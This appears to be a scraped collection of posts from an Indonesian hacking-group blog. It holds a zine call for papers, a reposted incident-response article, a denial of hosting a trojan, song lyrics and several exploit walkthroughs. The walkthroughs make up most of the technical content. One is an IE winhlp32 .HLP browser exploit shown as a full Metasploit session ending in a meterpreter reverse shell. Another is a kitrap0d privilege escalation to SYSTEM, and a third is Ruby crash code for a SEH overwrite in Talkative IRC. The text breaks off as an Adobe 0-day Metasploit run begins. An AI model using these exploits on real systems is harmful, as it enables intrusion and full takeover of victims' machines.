TOKET Volume 7 Call For Paper
Dear hackerz,
Kami kecoak elektronik sedang menyiapkan Terbitan Online Kecoak Elektronik (TOKET) Volume 7 sebagai kelanjutan kontribusi kami pada dunia underground serta upaya kami dalam pencapaian misi memberikan pendidikan keamanan jaringan komputer pada penggiat IT security. Adapun rencana penerbitan TOKET volume 7 adalah pada hari kemerdekaan NKRI tanggal 17 Agustus 2010 dengan detail berikut:
kecoak@yourserver~> head -5 cfp.sh
#
# !/bin/sh
# CALL FOR PAPER - CALL FOR PAPER - CALL FOR PAPER
# Terbitan Online Kecoak Elektronik (TOKET) volume 7
#
kecoak@yourserver~> sh cfp.sh
Dear all,
Kecoak elektronik sedang menyiapkan terbitnya TOKET volume 7 meng
harapkan partisipasi semua dalam menulis artikel.
Kirimkan artikel anda dengan tema seperti di bawah ini :
1. Sistem Operasi (Windows, UNIX, *NIX)
2. Penyandian (Cryptography)
3. Hacking
4. Phreaking
5. Cracking (Cracking the Operating System)
6. Pemrograman
7. Networking
8. Human Computer Interaction (Interaksi Manusia Komputer)
9. Teknologi Informasi dan Sistem Informasi
TOKET juga menerima artikel berupa underground & hacktivism news,
spirit of hacking, dan government spying. Segera kirimkan artikel
anda ke :
staff@kecoak-elektronik.net
Deadline pengiriman - 10/08/2010
Rilis TOKET Vol 07 - 17/08/2010
kami tunggu artikel dari anda !!!
Salam hangat dari sarang kecoak.
~eL Byteskrew
kecoak@yourserver~> date
Mon Jul 12 10:09:15 WIT 2010
kecoak@yourserver~> tail -5 cfp.sh
# CALL FOR PAPER - CALL FOR PAPER - CALL FOR PAPER
# Terbitan Online Kecoak Elektronik (TOKET) volume 7
# http://kecoak-elektronik.net
# EOF
So be ready to hack all the night and prepare your article! We wait yours and appreciate it as well.
Creating a proactive enterprise security incident response program
From Creating aa proactive enterprise security incident response program
Information security incidents are a fact of life. We have witnessed them on the news and within our own organizations — attackers are getting into networks and stealing corporate secrets and customer data. It’s vital to take a proactive approach to incident response to be sure certain enterprises are equipped and ready for the next incident.
Incident preparation helps enterprises maintain controlled and efficient responses during chaotic incident response moments. While the ideal scenario would involve companies avoiding incidents altogether, it’s important to be realistic and make preparations that will allow for a brisk response in the event of a security incident. There are numerous steps to take in preparation, and in this tip, I outline several necessary steps for creating an efficient security incident response program.
Establish an incident response program and team
A security incident response team should set up a security incident response program in order to ensure there is an organized, management-approved plan in place. Management must support the team, and sign-off on the official charter, which should outline the mission, scope and objectives of the incident response program. Along with technical incident handlers, the incident response team should include operational and administrative support from IT, legal, HR and management.
Additionally, the security incident response team should work with management to set pre-defined thresholds for leaving systems infected for forensic analysis, isolating systems in “incident” VLANs, or completely disconnecting infected systems. It’s critical to be able to disconnect critical systems when dangerous situations occur, such as data exfiltration; it may be disruptive, but it’s better to disable a critical system as a last resort containment strategy, than to watch sensitive data fly out the door.
Once the plan is developed, the incident response team should create incident scenarios, test and practice pre-planned responses on an ongoing basis. This means providing resources for training response staff as well.
Establish a known good baseline
Detecting specific attack events — what files were accessed, deleted, added or modified, for example — is easier when enterprises already know what is on their networks. Establishing a known good baseline involves performing an inventory of all critical system files and obtaining their MD5 (Message-Digest algorithm 5) checksums. An MD5 checksum is a hash value of a file to perform validation against after an incident occurs. This enables responders to validate the integrity of files to see if any changes were made. For checking critical Windows files, a free utility called MD5 Deep can perform recursive checksum calculations in directories and subdirectories. For Unix and Linux flavors, the MD5sum command (e.g., # md5sum ) can be used. Other areas to baseline include network traffic, processes and services.
If having personnel watch logs all day is impossible due to limited resources or otherwise, administrators should dedicate time to reviewing logs on a regular basis. To make reviewing and correlating easier, all logs should be centralized to a syslog server and time should be synchronized across the enterprise using an NTP server. Place the syslog server on a separate segment (away from primary servers), with ACLs blocking all but syslog traffic to that server, typically UDP/514. In addition, log management tools such as ArcSight, Tenable Network Security’s Log Correlation Engine, and LogLogic can help make log analysis much easier. By reviewing server, application and infrastructure device logs regularly, analysts will develop a better understanding of what’s considered “normal” network traffic. The same is true of processes and services. Having a known good baseline will enable analysts to discern when new processes or services are introduced into systems.
Develop an incident response program toolkit
A combination of software and hardware tools can make responding to an incident easier and more efficient. A readily available bag should house all of these tools in a convenient spot for when an incident must be responded to on a moment’s notice. That bag should contain cables (cross-over, straight-through and console, just to name a few ), a network tap to passively collect data, blank CDs and hard drives, a laptop, pens and pads. Some good open source tools include Helix (a Linux bootable disc for system analysis), the dd copying program for making binary backups, netcat and cryptcat for moving data across the network, and the Sleuth Kit forensics software. Some commercial forensics tools include EnCase by Guidance Software Inc. and FTK 3 by AccessData Corp. Other useful open source tools include Fport by Foundstone Inc., Sysinternals by Microsoft and Mandiant Corp.’s Memoryze.
Develop security incident response program cheat sheets
When the pressure is on and chaos increases, it may be difficult to remember all the details for an efficient security incident response, especially with an audience of executives and other concerned stakeholders. Cheat sheets can help ease this pressure. A security incident cheat sheet should contain the proper commands and command switches that aren’t used on a daily basis, the questions to ask administrators upon arrival at the scene, and the proper steps for forensic evidence preservation. Security expert Lenny Zeltser and SANS have some excellent cheat sheets to get started.
The above steps touch on a few of the necessary activities for efficient security incident response preparation. However, no plan should remain static for too long. Organizations must be proactive in developing new countermeasures and response actions to emerging threats. Start collaborating and sharing incident information with both your organizaton’s ISPs and law enforcement. Develop escalation and notification procedures. It’s essential to stay current and track attack trends — especially those within the company’s sector. Preparation ensures that responses are planned, understood and executed properly by all members of the organization.
No, we never host trojan
Beberapa minggu yang lalu ada sebuah posting yang menyatakan bahwa situs kecoak elektronik menyimpan trojan, trojan tersebut akan masuk kedalam komputer pengunjung situs yang membuka halaman website kecoak-elektronik.net. Sayangnya, walaupun sang newbie memberikan penyataan yg cukup panjang lebar (sekaligus mempromosikan suatu website), namun tidak dapat memberikan detail masalah yang dia alami dengan baik. Dan posting tersebut adalah satu-satunya posting hingga saat ini dari user yang bersangkutan (wonder why?).
Beberapa hari yang lalu, seorang rekan memberitahu bahwa AV yang dia gunakan memberikan pesan bahwa terdapat ‘known attack’ dari situs www.kecoak-elektronik.net/log berupa RCE (Remote Code Execution) dalam VBScript. Pola serangan tersebut berasal dari aplikasi FIREFOX.EXE yang merupakan browser dia ketika mengakses situs kecoak elektronik. Dari analisis lebih lanjut didapatkan bahwa VBScript tersebut merupakan bagian dari isi blog kecoak elektronik (http://www.kecoak-elektronik.net/log/2010/03/06/malicious-hlp-kitrap0d-system-shell/) ketika membahas CVE2010-0483. Prinsip dasar web browser adalah mendownload isi suatu website dan menginterpretasikan berdasarkan engine-nya masing-masing. Untuk beberapa AV seperti Norton yang ‘cengkraman’ nya cukup kuat, maka isi website tersebut dapat dikenali sebagai ‘known attack pattern’. Bahasa kerennya untuk kasus ini adalah False Positive.
Berikut ini adalah contoh screenshot untuk kasus tersebut.
Berhubung orang yang pertama kali memberitahu kami melalui forum diatas tidak mampu menyuguhkan informasi detail yang membuat dia bisa ‘mengoceh’ bahwa situs kecoak elektronik dipasang trojan, maka kasus yang dia alami kami anggap sama dengan kasus False Positive AV. Kami tidak akan setolol itu menghosting suatu trojan pada website milik sendiri yang notabene ditujukan untuk share informasi kepada publik. Kami tidak mengambil keuntungan apapun dari publik dengan keberadaan website ini, bahkan sama sekali tidak memperdulikan masalah page rank ataupun melakukan instalasi adsense maupun meminta donasi demi kelancaran hosting, menyemangati utk menulis sesuatu yg berguna, sharing info dll.
Apakah mungkin website kecoak elektronik telah di-hack dan dimasukan suatu trojan?well, we’re livin in underground. Serang dan diserang adalah hal yang wajar, dan kemungkinan tersebut akan tetap ada. Tidak ada yang sempurna dalam dunia security. Untuk itu jika kalian memang merasa mampu memberikan petunjuk yang mengindikasikan bahwa telah terinstall trojan ataupun crimeware dalam website kecoak elektronik bisa mengirimkan email kepada kami untuk dianalisis lebih lanjut. Otherwise, we don’t f*ckin care ’bout ur f*ckin sh*t.
Last, beberapa hari yang lalu dilakukan perbincangan singkat antara beberapa staff kecoak elektronik. Sepertinya sudah beberapa kali kami menerima kabar ada individu yang ‘ngaku-ngaku’ anggota kecoak elektronik ketika melamar suatu pekerjaan, khususnya lowongan pekerjaan yang berbau IT Security. FYI, kami berusaha sebaik mungkin untuk menjaga kemurnian kecoak elektronik yang sifatnya underground dan non-profit community. Dan sepanjang yang kami tau, staff kecoak elektronik tidak pernah menyatakan status keanggotaan dalam kelompok kecoak elektronik kepada publik dengan tujuan profit oriented, khususnya dalam halĀ melamar pekerjaan.
Huh, that’s all folks. Sori jika ternyata pada postingan ini tidak ada hal berbau teknikal yang bisa dinikmati ataupun menjadi bahan diskusi. We’ll keep them posted later…
Cheers,
KEI
Zero Day – MC Frontalot
They take the world over one node at a time.
They put the seed in some software and make it shine.
so the dimwitted among us grab tight and install
put it right on the wall, and don’t notice at all
that the celebration of a day impends.
I want to note it on the calendar, I ready my pen,
I get ahead of my friends in my haste, I let slip
that the zero day is coming, MC Front still ill equipped.
Boom how it hits you, when it comes
if you’re touching on an interface you steady your thumbs
since you might have to jump ship quick, the sting stuns
it isn’t designed to destroy, it’s just how it runs
and I sing fun songs but this here is a warning
that the exploit’s open and it might sound corny
but I give a damn about the state of the Earth
expect a hacker has to wreck it just to teach it what it’s worth.
And on the first day, it’s already too late…
Press play, prepare as history is made:
“largest hack in one day,” all the headlines will say.
All out of time, hear the chime from the buzzer.
Found this bug on my own, no need for a fuzzer.
“It’s already too late,” spreading as we planned.
No need for the NO OPs, I know just where to land.
Clearing out the registers, with pointers to my functions,
loaded to your memory and writing new instructions.
Braindump i/o, siphoned out the eye holes;
enticed so i’m digging through the disassembled byte code.
Push pop change order stack frame FILO
filesystem inodes, all fall to my flow.
Running over, there again i go:
self-propagation engine, polymorphic sideshow.
Every network, we’re found to get around…
the exploit payload encoded in this sound.
Man, cousin, I’m about to put in the work,
assert authority. Administrative access: crack this.
If your patches back in the past, this
0day gets you on a root trip. True crypt.
Key file, I will keystyle shell code,
triple sevens all up on the ch mod.
Shhh mode, how I’m keeping this here,
’cause if I keep my game on tight my 0day lasts another year.
You’re a little bit late.
I had that nfsd back in ninety-eight
and the DCOM bomb owned the Zone Alarm
so get your lip balm kitty; NEDM three fitty.
Got them bots in every city with the spamtec committee
and yt the almighty, zero day beats flying. And who’s giant?
That’s us. With the upstream plus, we’re CAN-SPAM compliant.
Yo, when it flips, new world is a permanent state.
Cultivate paranoia ’cause the Huns at the gate
are many millions strong, all arrive in a spate.
YT Crack and Int80 been shipping them freight.
All walls up to date, let them come, you can cope.
Pwn the rug out from under you and sunder your hopes.
Send a no points bulletin out; they’re undiscovered.
Eyes to the horizon! Not much longer undercover.
Credits: http://frontalot.com/index.php/?page=lyrics&lyricid=65
Malicious .hlp, kiTrap0d, system shell
Pada tanggal 26 February 2010, Maurycy Prodeus mengeluarkan public disclosure terhadap bug internet explorer 6, 7, dan 8 yang dapat di-eksploitasi menggunakan malicious .HLP file. Berikut ini pernyataan dari maurycy,
It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6
using VBScript. Passing malicious .HLP file to winhlp32 could allow
remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe
Intinya, dengan memanfaatkan VBScript maka user dapat meng-ekesekusi winhlp32.exe untuk membuka suatu file bertipe .hlp (windows help file) melalui browser internet explorer 6, 7, 8. Dan jika file .hlp tersebut sudah dimodifikasi sehingga menjadi malicious .hlp maka user dapat di-eksploitasi untuk menjalankan malicious code. Pihak microsoft untuk sementara memasukan ekstensi file .hlp kedalam kategori ‘unsafe file types’.
Untuk men-trigger vulnerability diatas cukup unik dan membutuhkan interaksi dari user untuk menekan tombol F1 ketika MessageBox muncul. Syntax untuk menampilkan MessageBox melalui VBScript sebagai berikut,
MsgBox(prompt[,buttons][,title][,helpfile,context])
Windows help file pada syntax diatas dapat diakses menggunakan samba share, berikut ini PoC dari maurycy untuk men-trigger vulnerability tersebut dan membuat user mengkases malicious .hlp file dari samba share yang telah dipersiapkannya,
PoC tersebut dapat dilihat dari sini.
Jelas terlihat bahwa malicious .hlp file yang digunakan terletak pada \\184.73.14.110\PUBLIC\test.hlp. Ketika user terpancing untuk mengeksekusi maka win32hlp.exe akan berusaha membuka test.hlp tersebut yang justru mengakibatkan eksekusi calc.exe.
Maurycy memberikan PoC tambahan bahwa terdapat bug stack-overflow pada win32hlp.exe ketika mengeksekusi parameter dengan path yang sangat panjang, namun berhubung win32hlp.exe di-compile menggunakan feature /GS maka bug tersebut tidak dapat di-eksploitasi begitu saja.
Saat ini \\184.73.14.110\PUBLIC\test.hlp tidak dapat diakses lagi, namun metasploit sudah memasukan exploit win32hlp tersebut kedalam trunk terbarunya. Ketika tulisan ini dibuat, versi trunk yang dimaksud adalah SVN r8723. Jika kalian penasaran ingin melihat malicious .hlp yang sebelumnya digunakan oleh maurycy, maka dapat melihat dari direktori metasploit di ‘data/exploits/runcalc.hlp’.
Jduck meng-integrasikan exploit tersebut kedalam metasploit framework menggunakan fasilitas WebDAV, sehingga kita tidak perlu membuat samba server untuk dapat diakses oleh target. Dengan beberapa trik yang memanfaatkan protocol WebDAV kita dapat meng-eksploitasi target dengan vulnerability diatas. Kategori eksploit ini masuk dalam ‘browser exploitaion’.
Berikut ini contoh penggunaannya,
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 531 exploits - 248 auxiliary
+ -- --=[ 196 payloads - 23 encoders - 8 nops
=[ svn r8724 updated today (2010.03.05)
msf exploit(ie_winhlp32) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.2.104 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ie_winhlp32) > exploit
[*] Exploit running as background job.
msf exploit(ie_winhlp32) >
[*] Started reverse handler on 192.168.2.104:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.2.104:80/
[*] Server started.
msf exploit(ie_winhlp32) >
[*] Request for "/" does not contain a sub-directory, redirecting to /pXdaQozNq/ ...
[*] Responding to GET request from 192.168.2.105:1367
[*] Using \\192.168.2.104\pXdaQozNq\OZdxWwnxWuR8K.hlp ...
[*] Sending HTML page to 192.168.2.105:1367...
[*] Request for "/pXdaQozNq" does not contain a sub-directory, redirecting to /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending directory multistatus for /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending HLP multistatus for /pXdaQozNq/OZdxWwnxWuR8K.hlp ...
[*] Responding to GET request from 192.168.2.105:1369
[*] Sending HLP to 192.168.2.105:1369...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/OZdxWwnxWuR8K.ANN ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/OZdxWwnxWuR8K.GID ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/OZdxWwnxWuR8K.CNT ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/OZdxWwnxWuR8K.FTG ...
[*] Request for "/pXdaQozNq" does not contain a sub-directory, redirecting to /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending directory multistatus for /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/OZdxWwnxWuR8K.TMP ...
[*] Request for "/pXdaQozNq" does not contain a sub-directory, redirecting to /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending directory multistatus for /pXdaQozNq/ ...
[*] Sending 404 for PUT /pXdaQozNq/OZdxWwnxWuR8K.TMP ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending EXE multistatus for /pXdaQozNq/calc.exe ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/shell32.dll ...
[*] Request for "/pXdaQozNq" does not contain a sub-directory, redirecting to /pXdaQozNq/ ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending directory multistatus for /pXdaQozNq/ ...
[*] Responding to GET request from 192.168.2.105:1369
[*] Sending EXE to 192.168.2.105:1369...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/rsaenh.dll ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/%1 ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/calc.exe.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/calc.exe.Config ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/ws2_32.dll ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/WS2HELP.dll ...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/hnetcfg.dll ...
[*] Sending stage (747008 bytes)
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/crypt32.dll ...
[*] Meterpreter session 1 opened (192.168.2.104:4444 -> 192.168.2.105:1371)
[*] Received WebDAV PROPFIND request from 192.168.2.105:1369
[*] Sending 404 for /pXdaQozNq/IPHLPAPI.DLL ...
msf exploit(ie_winhlp32) > sessions
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.2.104:4444 -> 192.168.2.105:1371
msf exploit(ie_winhlp32) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: XPSP2\user
Sampai saat ini saya masih belum bisa menemukan letak masalah ketika metasploit digunakan dilingkungan Mac OSX, pemanfaatan feature webdav nya tidak berjalan dengan baik. Namun untuk metasploit yang berjalan diatas windows, exploit tersebut berhasil dieksekusi dengan baik seperti pada contoh diatas (anyone tried on linux?).
Exploit ini dapat digunakan pada feature ‘browser autopwn’-nya metasploit, so buat kalian para whitehat mulai dapat menikmati exploit ini untuk ditunjukan pada client saat proses pentest *heh*.
Finish?no. Sebagaimana terlihat dalam judul diatas, ada satu hal lagi yang akan kita bahas 
.
Pada 19 Januari 2010 yang lalu, tavis ormandy merilis public disclosure yang cukup (sangat?) menghebohkan, terutama bagi para pemerhati dunia security windows. Advisories yang dirilis oleh taviso dapat dilihat dari sini, inti dari advisories tersebut adalah sistem operasi microsoft windows menyimpan bug yang sifatnya 0day sejak tahun 1993. Bug tersebut di-klaim tetap ada sejak rilis Windows NT pada tanggal 27 Juli 1993 hingga implementasi Windows 7 saat ini (semua x86 32-bit windows vulnerable).
Pada saat public disclosure tersebut muncul tidak banyak pihak yang memahami ‘fungsi’-nya, contoh berikut ini ditambahkan dengan tujuan jika memang ada masyarakat indonesia yang belum mengerti (i knew, some of you are lazy to read english reference) maka dapat memahami fungsi dari exploitasi bug tersebut.
Intinya adalah kitrap0d digunakan sebagai local exploit untuk mendapatkan akses system pada windows. Jadi ketika kita berhasil meng-eksploitasi aplikasi dalam microsoft windows, namun akses yang kita dapatkan terbatas dalam arti user yang mengeksekusi adalah user biasa (non-administrator), maka dengan memanfaatkan exploit kitrap0d tersebut kita akan mendapatkan akses system yang tentu saja memberikan akses lebih tinggi.
Contoh paling mudah adalah memanfaatkan browser bug sebagai pintu masuk, seperti yang telah ditunjukan pada contoh diatas (bug win32hlp.exe), kita akan melihat informasi berikut ini:
meterpreter > getuid Server username: XPSP2\user
Hal tersebut didapatkan karena user yang dieksploitasi oleh exploit ie_win32hlp menggunakan user biasa (nama user nya ‘user’) ketika mengeksekusi exploit, dan ini biasanya dilakukan oleh ratusan bahkan ribuan pengguna komputer dalam suatu perusahaan atau organisasi dimana login kedalam windows tidak menggunakan hak akses administrator.
Metasploit mem-bundle exploit kitrap0d dengan meterpreter, sehingga kita dapat dengan mudah melakukan local exploit pada target windows untuk mendapatkan hak akses ’system’ jika paylod yang digunakan adalah meterpreter. Berikut ini contoh nya,
meterpreter > getuid
Server username: XPSP2\user
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > sysinfo
Computer: XPSP2
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run kitrap0d
[*] Currently running as XPSP2\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\fEiMXC.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1948)...
[*] Received WebDAV PROPFIND request from 192.168.2.105:1372
[*] Sending 404 for /pXdaQozNq/cmd.exe ...
'\\192.168.2.104\pXdaQozNq'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x2890a bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 300
[?] OpenProcess(300) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter >
Well, that’s the lesson for tonight folks. Don’t care from which side you are from, goodboy and badboy can use metasploit for evil thing. Use your own creativity to get more and more from opensource product (anyone interested to put above two into ’sploit pack’? :p).
Have a nice weekend.
ToKeT 6th Edition
Sesuai rencana, Terbitan Online Kecoak ElekTronik (TOKET) diterbitkan pada hari ini, 15 February 2010. Toket edisi ke-6 ini berisi 6 buah artikel, diantaranya:
0x00-Introduction ................................. BytesKrew 0x01-Exploiting Future Internet - Defeating IPv6... Ph03n1X 0x02-Fun with Elf and Ptrace....................... Elz 0x03-Tale stories behind pop+pop+ret............... !@#$%^&*() 0x04-RTLD FreeBSD Bugs Analysis.................... Elz 0x05-Modifying Source Code - Stealing Password..... BytesKrew 0x06-Eleonore and The Crimeware Myth............... G.S
We just had valentine yesterday, so I don’t wanna give bad words following this release. We already have pretty much ‘bad stuff’ within this edition, that’s enough .
So, enjoy, undergr0und…and be a ‘good’ boy.
SEH Overwrite for n00b
Baru-baru ini disalah satu forum yang membahas security ada diskusi mengenai SEH overwrite, SEH overwrite merupakan salah satu metode favorite yang umum digunakan untuk meng-eksploitasi aplikasi dalam sistem operasi Microsoft Windows. Dan berhubung ini adalah malam minggu (hey…what’s the correlation??), then let’s talk about this.
Kita tidak akan menceritakan secara detail mengenai apa itu SEH, mungkin akan dibahas pada waktu yang lain, yang pasti SEH (Structure Exception Handle) merupakan salah satu teknologi yang diusung oleh sistem operasi Microsoft Windows dan dapat dimanfaatkan untuk proses eksploitasi suatu bug, khususnya stack based memory corruption. Bisa dibilang SEH overwrite merupakan tehnik yang melibatkan bug aplikasi dilingkungan stack.
Prinsipnya adalah, jika kita bisa membuat suatu aplikasi crash, dan crash tersebut berada di lingkungan stack (contoh: stack-based buffer overflow), dan ketika aplikasi crash ternyata struktur rantai SEH (SEH chain) bisa di-overwrite, maka kemungkinan besar kita bisa mengambil alih sistem dengan memanfaatkan tehnik SEH Overwrite.
Talkative IRC 0.4.4.16 Remote Stack Overflow
Bug ini merupakan bug lama, namun proses eksploitasinya yang memanfaatkan SEH overwrite cukup menarik untuk menjadi bahan pembelajaran. Jika kalian ingin mencoba maka dapat mendownload versi software yang vulnerable dari link ini. Saat tulisan ini dibuat, talkative masih tetap vulnerable walaupun di download dari situs resminya. Sepertinya developer software tersebut sudah tidak melanjutkan pengembangan software ini.
Dari milw0rm, kita tahu bahwa exploitasi talkative dengan memanfaatkan SEH overwrite. Crash dapat di-trigger dengan code berikut ini:
#!/usr/bin/env ruby
# lokasi library metasploit untuk digunakan (rex)
msfbase = '/Applications/Metasploit/lib'
$:.unshift(msfbase)
require 'rex'
# definisikan port untuk listen connection
server_param = { 'LocalPort' => '6667' }
# buat dan aktifkan server
sock = Rex::Socket::TcpServer.create(server_param)
chld = sock.accept
chld.write(":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n")
chld.get_once
# crash
crash = ":" + "A" * 500 + " PRIVMSG " + "J" * 4 + " : /FINGER " + "K" * 8 + ".\r\n"
chld.put(crash)
sock.close
Dengan menggunakan windbg kita dapat melihat posisi berikut ini ketika crash terjadi:
(36c.4f4): Unknown exception - code 0eedfade (first chance) ModLoad: 662b0000 66308000 C:\WINDOWS\system32\hnetcfg.dll ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll (36c.7cc): Unknown exception - code 0eedfade (first chance) (36c.4f4): Unknown exception - code 0eedfade (first chance) (36c.4f4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=00000000 ecx=0012f0d0 edx=00000004 esi=00000000 edi=00421c40 eip=004d8260 esp=0012f08c ebp=0012f1c4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** WARNING: Unable to verify checksum for C:\Program Files\Vuln\Talkative IRC\Talkative IRC.exe *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Vuln\Talkative IRC\Talkative IRC.exe Talkative_IRC+0xd8260: 004d8260 8b40f0 mov eax,dword ptr [eax-10h] ds:0023:41414131=????????
Kita bisa lihat bahwa crash terjadi di lokasi 0×004d8260. Crash mengakibatkan terjadinya suatu exception (access violation), berikut ini operasi yang menyebabkan terjadinya crash,
mov eax, dword ptr [eax-10h] ds:0023:41414131=????????
Pada posisi tersebut, nilai eax berisi karakter yang kita kirimkan (0×41414141) dan dalam operasi tersebut nilai dari pointer yang ditunjuk oleh [eax-10h] akan di masukan kedalam register eax. Namun karena nilai eax telah dimodifikasi melalui inputan server maka operasi tersebut menunjuk lokasi yang tidak valid (0×41414131) dan mengakibatkan suatu “access violation”.
.upcoming 26c3.
.here be dragons, conference unique yang memiliki fans fanatik ini, banyak menarik perhatian bagi security enthusiasts baik materi yang jarang di temukan dalam conference security lainnya atau pengemasan events yang berbeda salah satunya ini bahkan xorl membuatkan simple shell script utk memantau perubahan schedule 26c3.
.bagi yang sulit menerjemahkan German language, post di googlesystem bisa di jadikan acuan.
.and u know the reason why english language is important-
Twitter and Adobe 0.9-day spl0it
Salah satu artis yang terkenal dengan istilah ‘bechek’-nya pernah bilang dalam salah satu sesi wawancara untuk “acara televisi full of non-sense but terribly popular” (attention: something called infoblabla) bahwa twitter, facebook, friendster itu gak ada gunanya. Do’i gak mungkin ikutan begituan karena terlalu sibuk dengan skull, corse, blablabla. Dan yang ikutan begituan (attention: geek said, social networking) hanya orang-orang yang gak punya kerjaan.
Well, somehow, this cute little girl *heh??* probably right.
Unfortunately, gak semua orang update status untuk hal-hal yang tidak perlu. Komunitas security umumnya seringkali memposting hal-hal yang bermanfaat, dan lebih cepat mendapatkan informasi tersebut dibandingkan menunggu muncul di blog, news, forum, dll. Beberapa hal menarik diantaranya diskusi kecil-kecilan mengenai bug dan expl0it.
Baru-baru ini merebak mengenai adobe acrobat reader 0day, salah satu yang membahas bisa lihat di http://bit.ly/7UjG26. HDM dalam twitter nya pernah meminta contoh exploit tersebut bagi siapa saja yang memilikinya, dan dalam waktu singkat contoh 0day sploit tersebut didapatkan, copy nya bisa di download dari http://bit.ly/5VqgVv. Dan tentu saja dalam beberapa jam exploit tersebut muncul dalam repo metasploit, let’s give it a try:
Snow $ sudo ./msfconsole
Password:
888 888 d8b888
